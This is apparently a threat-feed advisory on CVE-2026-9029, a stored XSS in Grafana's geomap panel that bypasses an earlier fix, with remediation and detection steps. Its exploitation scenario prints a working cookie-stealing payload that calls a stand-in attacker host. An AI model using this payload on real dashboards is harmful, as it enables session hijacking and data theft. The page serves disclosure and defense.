AI Threat Alert

CVE-2026-9029: Grafana: stored XSS in geomap bypasses CVE-2023-0507 fix

HIGH
Published June 22, 2026
CISO Take

Grafana's geomap panel contains a sanitize-then-interpolate ordering flaw where the HTML sanitizer runs on the raw template string before variable substitution occurs, meaning an attacker-controlled variable value is injected into element.innerHTML without escaping. Any user holding Editor-level access — a low privilege threshold — can plant a persistent XSS payload in a textbox variable's default value that fires automatically for every dashboard viewer, no interaction beyond page load required. This is an explicit bypass of the CVE-2023-0507 patch, indicating Grafana's XSS defense layer has a structural gap rather than a one-off miss. Organizations running Grafana as their MLOps observability or AI model monitoring layer are directly exposed: a compromised Editor account can silently exfiltrate session tokens, scrape displayed model metrics, or pivot laterally into internal tooling. Patch to the vendor-fixed release immediately; if patching is delayed, restrict Editor role assignments and audit dashboard template variables for unexpected HTML or script content.

Sources: NVD grafana.com ATLAS

What is the risk?

High risk for organizations using Grafana in ML/AI monitoring stacks. CVSS 7.3 reflects network-reachable, low-complexity exploitation requiring only Editor-level credentials and a single victim page load. The fix-bypass nature elevates this beyond a typical stored XSS — teams that previously patched CVE-2023-0507 and considered themselves remediated are still vulnerable. No public exploit or CISA KEV listing currently, but the attack primitive (craft variable value, wait for viewers) is trivial to operationalize. Blast radius scales with dashboard sharing practices: shared ML monitoring dashboards in larger organizations could expose dozens to hundreds of security and engineering staff.

How does the attack unfold?

Privilege Abuse
Adversary with Editor-level Grafana credentials (obtained via phishing, credential stuffing, or insider access) modifies a textbox template variable's default value to a crafted XSS payload in a widely-shared ML monitoring dashboard.
AML.T0012
Sanitizer Bypass
Grafana's sanitizeTextPanelContent() processes the raw template string before getTemplateSrv().replace() substitutes the variable value, so the injected payload bypasses sanitization and is embedded unescaped in the geomap panel's HTML output.
AML.T0049
Victim Execution
Any user who opens the dashboard triggers the XSS — the payload executes in their browser via element.innerHTML without any additional interaction beyond the page load.
AML.T0011
Data Exfiltration & Pivot
The JavaScript payload exfiltrates session cookies and visible ML monitoring data to attacker infrastructure, and may pivot to internal AI serving endpoints or model management APIs accessible from the victim's authenticated session.
AML.T0025

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Grafana OSS No patch

Do you use Grafana OSS? You're affected.

How severe is it?

CVSS 3.1
7.3 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI Required
S Unchanged
C High
I High
A None

What should I do?

6 steps

  1. Patch: Apply the vendor-supplied fix referenced in the security advisory at grafana.com/security/security-advisories/cve-2026-9029 — upgrade to the patched Grafana OSS release immediately.

  2. Interim workaround: Disable the geomap panel plugin across affected Grafana instances if patching cannot be done immediately.

  3. Privilege audit: Review Editor role assignments and remove any accounts that do not require dashboard editing capabilities — this directly reduces the attacker surface.

  4. Dashboard audit: Inspect all dashboard template variable default values for suspicious HTML, script tags, or JavaScript URIs; use Grafana's dashboard API to enumerate variables at scale.

  5. Detection: Review Grafana audit logs for unexpected variable modifications by Editor-level accounts; alert on base64-encoded strings or script keywords appearing in dashboard configuration.

  6. Defense-in-depth: Enforce a strict Content Security Policy on the Grafana origin to limit JavaScript execution scope even if XSS fires.

How is it classified?

Code Execution Data Leakage Auth Bypass Framework API AML.T0011 AML.T0025 AML.T0048.003 AML.T0049

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
A.9.4 - Access control to AI system components
NIST AI RMF
GOVERN 6.1 - Policies and procedures for AI risk management
OWASP LLM Top 10
LLM09:2025 - Misinformation

Frequently Asked Questions

What is CVE-2026-9029?

Grafana's geomap panel contains a sanitize-then-interpolate ordering flaw where the HTML sanitizer runs on the raw template string before variable substitution occurs, meaning an attacker-controlled variable value is injected into element.innerHTML without escaping. Any user holding Editor-level access — a low privilege threshold — can plant a persistent XSS payload in a textbox variable's default value that fires automatically for every dashboard viewer, no interaction beyond page load required. This is an explicit bypass of the CVE-2023-0507 patch, indicating Grafana's XSS defense layer has a structural gap rather than a one-off miss. Organizations running Grafana as their MLOps observability or AI model monitoring layer are directly exposed: a compromised Editor account can silently exfiltrate session tokens, scrape displayed model metrics, or pivot laterally into internal tooling. Patch to the vendor-fixed release immediately; if patching is delayed, restrict Editor role assignments and audit dashboard template variables for unexpected HTML or script content.

Is CVE-2026-9029 actively exploited?

No confirmed active exploitation of CVE-2026-9029 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-9029?

1. Patch: Apply the vendor-supplied fix referenced in the security advisory at grafana.com/security/security-advisories/cve-2026-9029 — upgrade to the patched Grafana OSS release immediately. 2. Interim workaround: Disable the geomap panel plugin across affected Grafana instances if patching cannot be done immediately. 3. Privilege audit: Review Editor role assignments and remove any accounts that do not require dashboard editing capabilities — this directly reduces the attacker surface. 4. Dashboard audit: Inspect all dashboard template variable default values for suspicious HTML, script tags, or JavaScript URIs; use Grafana's dashboard API to enumerate variables at scale. 5. Detection: Review Grafana audit logs for unexpected variable modifications by Editor-level accounts; alert on base64-encoded strings or script keywords appearing in dashboard configuration. 6. Defense-in-depth: Enforce a strict Content Security Policy on the Grafana origin to limit JavaScript execution scope even if XSS fires.

What systems are affected by CVE-2026-9029?

This vulnerability affects the following AI/ML architecture patterns: ML monitoring and observability platforms, MLOps dashboards, AI model serving monitoring, Data pipeline observability stacks, GPU and training infrastructure dashboards.

What is the CVSS score for CVE-2026-9029?

CVE-2026-9029 has a CVSS v3.1 base score of 7.3 (HIGH).

What is the AI security impact?

Affected AI Architectures

ML monitoring and observability platformsMLOps dashboardsAI model serving monitoringData pipeline observability stacksGPU and training infrastructure dashboards

MITRE ATLAS Techniques

AML.T0011 User Execution
AML.T0025 Exfiltration via Cyber Means
AML.T0048.003 User Harm
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Art. 9
ISO 42001: A.9.4
NIST AI RMF: GOVERN 6.1
OWASP LLM Top 10: LLM09:2025

What are the technical details?

Original Advisory

The geomap panel's XYZ tile layer has a sanitize-then-interpolate ordering bug. sanitizeTextPanelContent() runs on the raw template string before getTemplateSrv().replace() substitutes the variable value, which uses the glob format with no HTML escaping. The result is passed to OpenLayers via element.innerHTML. An Editor can set a textbox variable's default value to an XSS payload that executes for every user who opens the dashboard. This is a bypass of the CVE-2023-0507 fix

Exploitation Scenario

An adversary with a compromised or insider Editor account on a Grafana instance used for AI model monitoring opens the geomap panel configuration and sets a textbox template variable's default value to a JavaScript payload such as `<img src=x onerror=fetch('https://attacker.io/?t='+document.cookie)>`. Because the sanitizer processes the raw template string before variable interpolation, the payload passes sanitization clean and is injected verbatim into the OpenLayers HTML. Every ML engineer, data scientist, or CISO who opens the monitoring dashboard automatically exfiltrates their Grafana session cookie to the attacker. The attacker replays the session cookie to access Grafana as those users, views sensitive ML pipeline metrics and model serving endpoint configurations, and may discover internal URLs to pivot deeper into the AI infrastructure.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

References

Timeline

Published
June 22, 2026
Last Modified
June 22, 2026
First Seen
June 22, 2026

Related Vulnerabilities

CRITICAL CVE-2023-3765 10.0

MLflow: path traversal allows arbitrary file read

Same attack type: Data Leakage
CRITICAL CVE-2025-5120 10.0

smolagents: sandbox escape enables unauthenticated RCE

Same attack type: Data Leakage
CRITICAL CVE-2025-2828 10.0

LangChain RequestsToolkit: SSRF exposes cloud metadata

Same attack type: Auth Bypass
CRITICAL CVE-2025-53767 10.0

Azure OpenAI: SSRF EoP, no auth required (CVSS 10)

Same attack type: Auth Bypass
CRITICAL CVE-2025-59528 10.0

Flowise: Unauthenticated RCE via MCP config injection

Same attack type: Code Execution
Back to Threat Feed